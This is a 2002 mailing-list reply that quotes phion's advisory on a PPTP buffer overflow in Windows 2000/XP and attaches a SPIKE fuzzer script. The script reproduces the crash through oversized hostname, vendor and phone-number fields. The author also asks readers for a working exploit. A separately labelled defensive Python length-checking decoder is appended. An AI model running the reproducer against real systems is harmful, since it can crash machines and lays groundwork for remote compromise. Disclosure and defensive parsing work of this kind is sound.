Message-ID: <1033071201.30393.222.camel@www.immunitysec.com>
From: dave at immunitysec.com (Dave Aitel)
Subject: Re: Microsoft PPTP Server and Client remote vulnerability
SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other
exploits to muck with, one or the other :>)
-dave
P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
at http://www.immunitysec.com/spike.html, if you haven't already.
P.P.S. This script is released under the terms of the GNU GPL v 2.0.
On Thu, 2002-09-26 at 05:43, sh@...on.com wrote:
> phion Security Advisory 26/09/2002
>
> Microsoft PPTP Server and Client remote vulnerability
>
>
> Summary
> -----------------------------
>
> The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
> remotely exploitable pre-authentication buffer overflow.
>
>
> Affected Systems
> -----------------------------
>
> Microsoft Windows 2000 and XP running either a PPTP Server or Client.
>
>
> Impact
> -----------------------------
>
> With a specially crafted PPTP packet it is possible to overwrite kernel
> memory.
>
> A DoS resulting in a lockup of the machine has been verified on
> Windows 2000 SP3 and Windows XP.
>
> A remote compromise should be possible deploying proper shellcode,
> as we were able to fill EDI and EDX with our data.
>
> Clients are vulnerable too, because the Service always listens on port
> 1723 on any interface of the machine. This might be of special concern
> to DSL users who use PPTP to connect to their modem.
>
>
> Solution
> -----------------------------
>
> As a temporary solution for the Client issue, one might firewall the PPTP
> port in the Internet Connection Firewall for Windows XP.
>
> We don't know of any solution for Windows 2000 and Windows XP PPTP servers.
>
> The vendor has been informed.
>
>
> Acknowledgements
> -----------------------------
>
> The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
> on behalf of phion Information Technologies.
>
>
> Contact Information
> -----------------------------
>
> phion Information Technologies can be reached via:
> office@...on.com / http://www.phion.com
>
> Stephan Hoffmann can be reached via:
> sh@...on.com
>
> Thomas Unterleitner can be reached via:
> t.unterleitner@...on.com
>
> References
> -----------------------------
>
> [1] phion Information Technologies
> http://www.phion.com/
>
> Exploit
> -----------------------------
>
> phion Information Technologies will not provide an exploit for this issue.
>
>
> Disclaimer
> -----------------------------
>
> This advisory does not claim to be complete or to be usable for any
> purpose.
>
> This advisory is free for open distribution in unmodified form.
>
> Articles or Publications that are based on information from this advisory
> have to include link [1].
>
>
-------------- next part --------------
//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname
s_string_variable("A");
s_binary_repeat("00",63);
//vendor
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");
///
/// NEXT PACKET
///
///
//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 7 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//serial number
s_binary("0000");
//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//receive window size
s_binary("0003");
//processing delay
s_binary("0000");
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");
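Added example, not Dave's SPIKE script or phion's code: a defensive Python decoder for the two PPTP control messages the script above emits (Start-Control-Connection-Request, type 1, and Outgoing-Call-Request, type 7), with field offsets taken from my reading of RFC 2637 and therefore an assumption. It refuses any message whose declared lengths disagree with the bytes actually received instead of trusting them; the two builders only construct sample packets for exercising the check.

```python
import struct

PPTP_MAGIC_COOKIE = 0x1A2B3C4D  # the "1a 2b 3c 4d" cookie in the .spk script
SCCRQ, OCRQ = 1, 7              # control message types used by the script
FIXED_LEN = {SCCRQ: 156, OCRQ: 168}  # RFC 2637 sizes (assumption: my reading)

def parse_pptp_control(data: bytes) -> dict:
    """Decode a PPTP control message, raising ValueError on any length
    inconsistency rather than honouring the sender's declared sizes."""
    if len(data) < 12:
        raise ValueError("short header")
    length, msg_type, cookie, ctrl_type = struct.unpack("!HHIH", data[:10])
    if cookie != PPTP_MAGIC_COOKIE:
        raise ValueError("bad magic cookie")
    if msg_type != 1:
        raise ValueError("not a control message")
    if length != len(data):
        raise ValueError(f"declared length {length} != received {len(data)}")
    if ctrl_type not in FIXED_LEN:
        raise ValueError(f"unsupported control type {ctrl_type}")
    if length != FIXED_LEN[ctrl_type]:
        raise ValueError(f"type {ctrl_type} must be {FIXED_LEN[ctrl_type]} bytes")
    fields = {"ctrl_type": ctrl_type}
    if ctrl_type == SCCRQ:
        # hostname and vendor are fixed 64-byte fields: slice, never strlen()
        fields["hostname"] = data[28:92].split(b"\0", 1)[0]
        fields["vendor"] = data[92:156].split(b"\0", 1)[0]
    else:
        # phone-number length is attacker-controlled; bound it to the field
        phone_len = struct.unpack("!H", data[36:38])[0]
        if phone_len > 64:
            raise ValueError(f"phone number length {phone_len} exceeds 64")
        fields["phone"] = data[40:40 + phone_len]
        fields["subaddress"] = data[104:168].split(b"\0", 1)[0]
    return fields

def is_valid(data: bytes) -> bool:
    try:
        parse_pptp_control(data)
        return True
    except ValueError:
        return False

def build_sccrq(hostname: bytes, vendor: bytes) -> bytes:
    """Constructed sample: well-formed SCCRQ with the script's fixed values."""
    hdr = struct.pack("!HHIHHHHIIHH", 156, 1, PPTP_MAGIC_COOKIE, SCCRQ, 0,
                      0x0100, 0, 3, 2, 0xFFFF, 1)
    return hdr + hostname[:64].ljust(64, b"\0") + vendor[:64].ljust(64, b"\0")

def build_ocrq(phone: bytes, phone_len: int = -1) -> bytes:
    """Constructed sample OCRQ; phone_len < 0 means 'declare the true length'."""
    declared = len(phone) if phone_len < 0 else phone_len
    hdr = struct.pack("!HHIHHHHIIIIHHHH", 168, 1, PPTP_MAGIC_COOKIE, OCRQ, 0,
                      0, 0, 0x960, 0x989680, 2, 3, 3, 0, declared, 0)
    return hdr + phone[:64].ljust(64, b"\0") + b"\0" * 64
```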